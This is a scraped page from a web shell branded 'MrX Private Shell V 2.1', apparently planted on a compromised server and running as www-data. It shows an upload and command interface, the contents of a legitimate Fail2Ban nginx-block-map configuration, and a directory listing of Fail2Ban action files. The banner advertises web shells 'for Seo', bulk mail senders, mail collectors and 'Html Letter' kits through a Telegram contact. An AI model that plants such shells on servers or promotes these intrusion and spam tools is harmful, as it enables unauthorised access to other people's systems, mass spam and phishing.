__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
# Fail2Ban configuration file for black-listing via nginx
#
# Author: Serg G. Brester (aka sebres)
#
# To use 'nginx-block-map' action you should define some special blocks in your nginx configuration,
# and use it hereafter in your locations (to notify fail2ban by failure, resp. nginx by ban).
#
# Example (argument "token_id" resp. cookie "session_id" used here as unique identifier for user):
#
#   http {
#     ...
#     # maps to check user is blacklisted (banned in f2b):
#     #map $arg_token_id      $blck_lst_tok { include blacklisted-tokens.map; }
#     map  $cookie_session_id $blck_lst_ses { include blacklisted-sessions.map; }
#     ...
#     # special log-format to notify fail2ban about failures:
#     log_format f2b_session_errors '$msec failure "$cookie_session_id" - $remote_addr - $remote_user '
#      ;#                  '"$request" $status $bytes_sent '
#       #                  '"$http_referer" "$http_user_agent"';
#
#     # location checking blacklisted values:
#     location ... {
#       # check banned sessionid:
#       if ($blck_lst_ses != "") {
#         try_files "" @f2b-banned;
#       }
#       ...
#       # notify fail2ban about a failure inside nginx:
#       error_page 401 = @notify-f2b;
#       ...
#     }
#     ...
#     # location for return with "403 Forbidden" if banned:
#     location @f2b-banned {
#       default_type text/html;
#       return 403 "<br/><center>
#         <b style=\"color:red; font-size:18pt; border:2pt solid black; padding:5pt;\">
#         You are banned!</b></center>";
#     }
#     ...
#     # location to notify fail2ban about a failure inside nginx:
#     location @notify-f2b {
#       access_log /var/log/nginx/f2b-auth-errors.log f2b_session_errors;
#     }
#   }
#   ...
#
# Note that quote-character (and possibly other special characters) are not allowed currently as session-id.
# Thus please add any session-id validation rule in your locations (or in the corresponding backend-service), 
# like in example below:
#
#   location ... {
#     if ($cookie_session_id !~ "^[\w\-]+$") {
#       return  403 "Wrong session-id"
#     }
#     ...
#   }
#
# The parameters for jail corresponding log-format (f2b_session_errors):
#
#   [nginx-blck-lst]
#   filter =
#   datepattern = ^Epoch
#   failregex = ^ failure "<F-ID>[^"]+</F-ID>" - <ADDR>
#   usedns = no
#
# The same log-file can be used for IP-related jail (additionally to session-related, to ban very bad IPs):
#
#   [nginx-blck-ip]
#   maxretry = 100
#   filter =
#   datepattern = ^Epoch
#   failregex = ^ failure "[^"]+" - <ADDR>
#   usedns = no
#

[Definition]

# path to configuration of nginx (used to target nginx-instance in multi-instance system,
# and as path for the blacklisted map):
srv_cfg_path = /etc/nginx/

# cmd-line arguments to supply to test/reload nginx:
#srv_cmd = nginx -c %(srv_cfg_path)s/nginx.conf
srv_cmd = nginx

# pid file (used to check nginx is running):
srv_pid = /run/nginx.pid

# command used to check whether nginx is running and configuration is valid:
srv_is_running = [ -f "%(srv_pid)s" ]
srv_check_cmd = %(srv_is_running)s && %(srv_cmd)s -qt

# first test nginx is running and configuration is correct, hereafter send reload signal:
blck_lst_reload = %(srv_check_cmd)s; if [ $? -eq 0 ]; then
                    %(srv_cmd)s -s reload; if [ $? -ne 0 ]; then echo 'reload failed.'; fi;
                  fi;

# map-file for nginx, can be redefined using `action = nginx-block-map[blck_lst_file="/path/file.map"]`:
blck_lst_file = %(srv_cfg_path)s/blacklisted-sessions.map

# Action definition:

actionstart_on_demand = false
actionstart = touch '%(blck_lst_file)s'

actionflush = truncate -s 0 '%(blck_lst_file)s'; %(blck_lst_reload)s

actionstop = %(actionflush)s

actioncheck = 

_echo_blck_row = printf '\%%s 1;\n' "<fid>"

actionban = %(_echo_blck_row)s >> '%(blck_lst_file)s'; %(blck_lst_reload)s

actionunban = id=$(%(_echo_blck_row)s | sed -e 's/[]\/$*.^|[]/\\&/g'); sed -i "/^$id$/d" %(blck_lst_file)s; %(blck_lst_reload)s

Filemanager

Name Type Size Permission Actions
abuseipdb.conf File 3.66 KB 0644
apf.conf File 587 B 0644
apprise.conf File 1.38 KB 0644
blocklist_de.conf File 2.65 KB 0644
bsd-ipfw.conf File 3.15 KB 0644
cloudflare-token.conf File 2.93 KB 0644
cloudflare.conf File 2.97 KB 0644
complain.conf File 4.66 KB 0644
dshield.conf File 7.5 KB 0644
dummy.conf File 1.68 KB 0644
firewallcmd-allports.conf File 1.47 KB 0644
firewallcmd-common.conf File 2.59 KB 0644
firewallcmd-ipset.conf File 3.58 KB 0644
firewallcmd-multiport.conf File 1.24 KB 0644
firewallcmd-new.conf File 1.85 KB 0644
firewallcmd-rich-logging.conf File 1021 B 0644
firewallcmd-rich-rules.conf File 1.71 KB 0644
helpers-common.conf File 592 B 0644
hostsdeny.conf File 1.62 KB 0644
ipfilter.conf File 1.54 KB 0644
ipfw.conf File 1.47 KB 0644
iptables-allports.conf File 291 B 0644
iptables-ipset-proto4.conf File 1.93 KB 0644
iptables-ipset-proto6-allports.conf File 814 B 0644
iptables-ipset-proto6.conf File 773 B 0644
iptables-ipset.conf File 2.52 KB 0644
iptables-multiport-log.conf File 2.11 KB 0644
iptables-multiport.conf File 232 B 0644
iptables-new.conf File 332 B 0644
iptables-xt_recent-echo.conf File 2.78 KB 0644
iptables.conf File 4.68 KB 0644
ipthreat.conf File 4.19 KB 0644
mail-buffered.conf File 2.44 KB 0644
mail-whois-common.conf File 1.03 KB 0644
mail-whois-lines.conf File 2.4 KB 0644
mail-whois.conf File 1.85 KB 0644
mail.conf File 1.72 KB 0644
mynetwatchman.conf File 5.2 KB 0644
netscaler.conf File 1.46 KB 0644
nftables-allports.conf File 383 B 0644
nftables-multiport.conf File 384 B 0644
nftables.conf File 6.17 KB 0644
nginx-block-map.conf File 3.92 KB 0644
npf.conf File 1.49 KB 0644
nsupdate.conf File 3.16 KB 0644
osx-afctl.conf File 497 B 0644
osx-ipfw.conf File 2.25 KB 0644
pf.conf File 3.66 KB 0644
route.conf File 1023 B 0644
sendmail-buffered.conf File 2.74 KB 0644
sendmail-common.conf File 1.89 KB 0644
sendmail-geoip-lines.conf File 1.72 KB 0644
sendmail-whois-ipjailmatches.conf File 1.03 KB 0644
sendmail-whois-ipmatches.conf File 1.01 KB 0644
sendmail-whois-lines.conf File 1.27 KB 0644
sendmail-whois-matches.conf File 1000 B 0644
sendmail-whois.conf File 950 B 0644
sendmail.conf File 829 B 0644
shorewall-ipset-proto6.conf File 3.44 KB 0644
shorewall.conf File 2.11 KB 0644
smtp.py File 6.13 KB 0644
symbiosis-blacklist-allports.conf File 1.47 KB 0644
ufw.conf File 2.32 KB 0644
xarf-login-attack.conf File 6.29 KB 0644
Filemanager